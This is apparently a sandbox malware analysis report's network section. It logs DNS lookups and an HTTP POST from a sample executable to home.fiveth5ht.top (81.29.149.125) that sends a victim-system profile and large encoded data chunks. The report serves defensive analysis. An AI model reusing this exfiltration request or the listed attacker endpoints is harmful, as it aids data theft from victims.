                                                          Dec 28, 2024 09:42:53.502914906 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.502944946 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502978086 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502991915 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.503020048 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.503053904 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.503106117 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.503113031 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.503153086 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.531935930 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.531989098 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.576777935 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.576823950 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.621864080 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.621906996 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622031927 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.622112036 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622148037 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622243881 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622307062 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622391939 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622452021 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622494936 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622575045 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622625113 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622704983 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622766972 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622819901 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622859001 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622896910 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622986078 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623028040 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623042107 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623111010 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623120070 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623195887 CET804973281.29.149.125192.168.2.4
Dec 28, 2024 09:42:53.623220921 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623291016 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623331070 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623356104 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623409986 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623414040 CET | 49732 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:53.623473883 CET | 49732 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:53.623524904 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623533964 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623570919 CET | 49732 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:53.623696089 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623706102 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623743057 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623745918 CET | 49732 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:53.623752117 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623827934 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623838902 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623874903 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623883009 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623914957 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.623924017 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624108076 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624128103 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624206066 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624213934 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624222994 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624258995 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624267101 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624286890 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624401093 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624408960 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624460936 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624517918 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624581099 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624589920 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624711037 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624722004 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624869108 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.624876976 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.625072956 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.625081062 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.625091076 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.625099897 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.625164032 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.625171900 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.625180006 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.651451111 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.651572943 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.691572905 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.691828012 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.691891909 CET | 49732 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:53.692079067 CET | 49732 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:53.696969032 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.741571903 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.741599083 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.741631985 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.741641045 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.741662025 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.742988110 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.742997885 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743010044 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743026018 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743093014 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743119001 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743189096 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743196964 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743300915 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743309975 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743379116 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743387938 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743462086 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743486881 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743565083 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743588924 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743617058 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743633032 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743731022 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743740082 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743782043 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743833065 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743870974 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743879080 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.743990898 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744014978 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744059086 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744067907 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744137049 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744144917 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744224072 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744234085 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744302988 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744311094 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744380951 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744389057 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744481087 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744550943 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744559050 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744658947 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744668007 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744676113 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744683981 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744693041 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744731903 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744740009 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744766951 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744810104 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744843006 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744888067 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744924068 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.744976044 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.745093107 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.745121956 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.811300039 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:53.811505079 CET | 80 | 49732 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:54.734040022 CET | 49733 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:54.853487015 CET | 80 | 49733 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:54.853591919 CET | 49733 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:54.861097097 CET | 49733 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:54.980577946 CET | 80 | 49733 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:56.168260098 CET | 80 | 49733 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:56.168334007 CET | 80 | 49733 | 81.29.149.125 | 192.168.2.4
Dec 28, 2024 09:42:56.168378115 CET | 49733 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:56.168612003 CET | 49733 | 80 | 192.168.2.4 | 81.29.149.125
Dec 28, 2024 09:42:56.287992001 CET | 80 | 49733 | 81.29.149.125 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 09:42:45.719130993 CET | 61659 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 09:42:45.719239950 CET | 61659 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 09:42:45.859224081 CET | 53 | 61659 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 09:42:45.859721899 CET | 53 | 61659 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 09:42:50.218509912 CET | 61662 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 09:42:50.218566895 CET | 61662 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 09:42:50.524202108 CET | 53 | 61662 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 09:42:50.527970076 CET | 53 | 61662 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 09:42:52.102221966 CET | 61664 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 09:42:52.102281094 CET | 61664 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 09:42:52.241796970 CET | 53 | 61664 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 09:42:52.241858006 CET | 53 | 61664 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 09:42:54.593385935 CET | 61666 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 09:42:54.593446016 CET | 61666 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 09:42:54.733359098 CET | 53 | 61666 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 09:42:54.733376026 CET | 53 | 61666 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 09:42:45.719130993 CET | 192.168.2.4 | 1.1.1.1 | 0xd3d | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:42:45.719239950 CET | 192.168.2.4 | 1.1.1.1 | 0x75c9 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 28, 2024 09:42:50.218509912 CET | 192.168.2.4 | 1.1.1.1 | 0xdd62 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:42:50.218566895 CET | 192.168.2.4 | 1.1.1.1 | 0x950b | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 28, 2024 09:42:52.102221966 CET | 192.168.2.4 | 1.1.1.1 | 0x76cb | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:42:52.102281094 CET | 192.168.2.4 | 1.1.1.1 | 0x277b | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 28, 2024 09:42:54.593385935 CET | 192.168.2.4 | 1.1.1.1 | 0xb0fc | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:42:54.593446016 CET | 192.168.2.4 | 1.1.1.1 | 0x1d6 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 28, 2024 09:42:45.859721899 CET | 1.1.1.1 | 192.168.2.4 | 0xd3d | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:42:45.859721899 CET | 1.1.1.1 | 192.168.2.4 | 0xd3d | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:42:50.527970076 CET | 1.1.1.1 | 192.168.2.4 | 0xdd62 | No error (0) | home.fiveth5ht.top | | 81.29.149.125 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:42:52.241858006 CET | 1.1.1.1 | 192.168.2.4 | 0x76cb | No error (0) | home.fiveth5ht.top | | 81.29.149.125 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:42:54.733376026 CET | 1.1.1.1 | 192.168.2.4 | 0xb0fc | No error (0) | home.fiveth5ht.top | | 81.29.149.125 | A (IP address) | IN (0x0001) | false
• httpbin.org
• home.fiveth5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 81.29.149.125 | 80 | 2336 | C:\Users\user\Desktop\QMtCX5RLOP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 09:42:50.650363922 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
Host: home.fiveth5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 501797
Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 33 39 37 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317203975", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 28, 2024 09:42:50.770030022 CET | 2472 | OUT | Data Raw: 70 58 38 35 4c 36 63 76 68 4d 5c 2f 2b 61 64 38 52 66 38 41 77 30 38 4d 2b 76 38 41 30 56 33 6d 66 31 62 5c 2f 41 4d 55 35 76 47 37 5c 2f 41 4b 4b 6e 77 72 5c 2f 38 50 66 46 33 5c 2f 77 42 41 35 5c 2f 4b 4e 55 63 6e 62 38 66 36 56 2b 34 33 37 54
Data Ascii: pX85L6cvhM\/+ad8Rf8Aw08M+v8A0V3mf1b\/AMU5vG7\/AKKnwr\/8PfF3\/wBA5\/KNUcnb8f6V+437Tv8AwS10HQdA+JOrfs7S+ItS1T4Y+LbbTrrwt4h1GPV9W8SeH7v4b+AfGE0+nXMFnYQvrOn6j4k1RYrGKzi+36ctvBCH1C2A1D8Q54J7WeW2uYZILiCR4poZUaOWKWNirxyIwDK6sCGUgEEV+7+FfjLwV4wZbi8fwp
Dec 28, 2024 09:42:50.770064116 CET | 2472 | OUT | Data Raw: 76 5c 2f 4a 38 6d 65 76 6d 2b 76 66 2b 66 38 36 5a 5c 2f 63 66 5a 6e 39 37 35 76 66 70 5c 2f 68 5c 2f 68 51 64 63 4e 76 6e 2b 69 49 66 4c 32 37 5c 2f 6b 66 62 35 76 38 41 79 30 48 34 66 58 72 54 50 6e 2b 56 5c 2f 77 44 58 4f 66 38 41 57 5c 2f 35
Data Ascii: v\/J8mevm+vf+f86Z\/cfZn975vfp\/h\/hQdcNvn+iIfL27\/kfb5v8Ay0H4fXrTPn+V\/wDXOf8AW\/5\/z2qXnO\/95\/nn7V\/X\/wCvTZIz8nz4cf5\/Oont8\/0ZvT6\/L9SHzNzbP4z\/AM8z\/rs\/59feoambfIXj7SfX9z9Ov+e3NM67\/kk3\/wDPOP05\/wA54rI6KfX5fqVjs8x3H\/bOSMc+\/wDn6fSmxb5P
Dec 28, 2024 09:42:50.770133972 CET | 2472 | OUT | Data Raw: 2b 7a 38 5c 2f 77 41 50 2b 43 61 55 2b 76 79 5c 2f 55 5a 38 38 63 61 52 6f 38 59 5c 2f 65 33 50 37 7a 5c 2f 6e 74 2b 50 72 36 5c 2f 54 46 47 66 34 30 65 53 46 35 66 33 76 6d 66 36 69 41 5a 5c 2f 6e 33 34 70 37 53 66 4d 79 66 66 6a 6a 5c 2f 64 66
Data Ascii: +z8\/wAP+CaU+vy\/UZ88caRo8Y\/e3P7z\/nt+Pr6\/TFGf40eSF5f3vmf6iAZ\/n34p7SfMyffjj\/df6rjv\/pWfSnyRuuzYn8\/tH17e3\/1zWZofuQ\/3j+H8hTae\/X8P6mmVxcj8v6+R\/k+frp+xB4ju5\/gvqOjLcM1pp\/i7V9Pu9Mn23On3trNa6Xq0a3+mXJnsb22afULkCG6tngdklzEx3u\/vuvfC74aeJvMk
Dec 28, 2024 09:42:50.770144939 CET | 2472 | OUT | Data Raw: 6a 42 34 65 30 5c 2f 57 5c 2f 43 76 37 57 76 37 4f 6b 66 78 37 38 5a 54 61 42 70 56 31 71 43 5c 2f 73 55 2b 4a 5c 2f 41 35 38 61 2b 47 50 67 35 72 6e 69 52 6f 72 74 74 42 38 65 5c 2f 47 62 78 37 70 38 6d 71 65 42 76 67 37 71 50 6c 7a 52 36 64 50
Data Ascii: jB4e0\/W\/Cv7Wv7Okfx78ZTaBpV1qC\/sU+J\/A58a+GPg5rniRorttB8e\/Gbx7p8mqeBvg7qPlzR6dPow1SzghlbTm1DzX\/nu\/wCCjfga1+HH7WnxB8J2uqXeufZNP8H6jd61qGm+HNK1HVb\/AMQeFtK8QX15f2nhTRfD2h\/aTc6nJEZrXSbaSeKKKW7a4u2nuZv6WfGnxE8H\/FrWP2AfiT8P9atfEXgzxp8ftd8QeH
Dec 28, 2024 09:42:50.770194054 CET | 2472 | OUT | Data Raw: 49 71 73 75 37 38 4b 68 5c 2f 77 44 51 50 38 5c 2f 68 30 5c 2f 7a 69 72 6e 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 71 7a 52 2b 33 79 66 79 41 5c 2f 7a 78 6a 50 76 51 64 50 76 5c 2f 41 4e 33 38 53 47 52 63 66 66 38 41 2b 57 6e 72 32 78 5c 2f 6e 38 73
Data Ascii: Iqsu78Kh\/wDQP8\/h0\/zirnl+\/wCn\/wBeqzR+3yfyA\/zxjPvQdPv\/AN38SGRcff8A+Wnr2x\/n8s+lRDf\/AB59s\/5x6dKsS\/xfh\/So\/L9\/0\/8Ar0G1Pr8v1I6gbvs\/z\/n37+1WWXb7ioZO34\/0oOwofP8APx9\/r06D\/PtzS7v+Wfb\/AOt9Ks+Xzv8A\/wBfXr9M9vX2qrJH8v8ArPrzn\/P+RQaU+vy\
Dec 28, 2024 09:42:50.770222902 CET | 2472 | OUT | Data Raw: 57 66 6d 5c 2f 75 50 2b 76 72 5c 2f 36 5c 2f 66 38 41 57 71 33 79 53 66 75 39 6e 7a 78 6e 39 31 2b 36 5c 2f 77 41 5c 2f 35 5c 2f 57 66 61 2b 63 76 36 2b 5a 30 44 46 5c 2f 6a 33 5c 2f 49 6b 6e 2b 74 50 66 72 78 5c 2f 50 6e 36 69 68 4a 48 77 6e 6b
Data Ascii: Wfm\/uP+vr\/6\/f8AWq3ySfu9nzxn91+6\/wA\/5\/Wfa+cv6+Z0DF\/j3\/Ikn+tPfrx\/Pn6ihJHwnkvv\/eiLzOkH+en+eaftf5P9X\/rf89\/89Oc0ySP+PZs\/6aGXz8dfX8f\/ANdHtfOX9fMBm1I5N6fOP9bL\/wBNv0\/rjv1pd37twnmb44v4Ivr\/AJ\/rzTo\/7m+NPMi\/1n\/LCHv\/AJ\/mKZ5n7zfvk\/Pv
Dec 28, 2024 09:42:50.770272970 CET | 2472 | OUT | Data Raw: 32 62 63 5c 2f 38 41 4d 6a 5c 2f 45 64 75 4f 66 37 76 68 42 71 5c 2f 4b 37 39 76 7a 34 78 5c 2f 44 37 34 32 66 47 58 77 7a 34 6e 2b 47 4f 75 5c 2f 38 41 43 53 2b 48 64 4e 2b 47 47 69 65 48 72 7a 55 7a 70 65 74 36 4e 35 65 74 57 76 69 6e 78 6e 71
Data Ascii: 2bc\/8AMj\/EduOf7vhBq\/K79vz4x\/D742fGXwz4n+GOu\/8ACS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4z4X4dxlaMcFisrweYYvNsqwOXVqyxtGNbAUa9SVRV4OVCPNzH+cf7SXxW8D\/EP6O1XAcJeJfhTxv
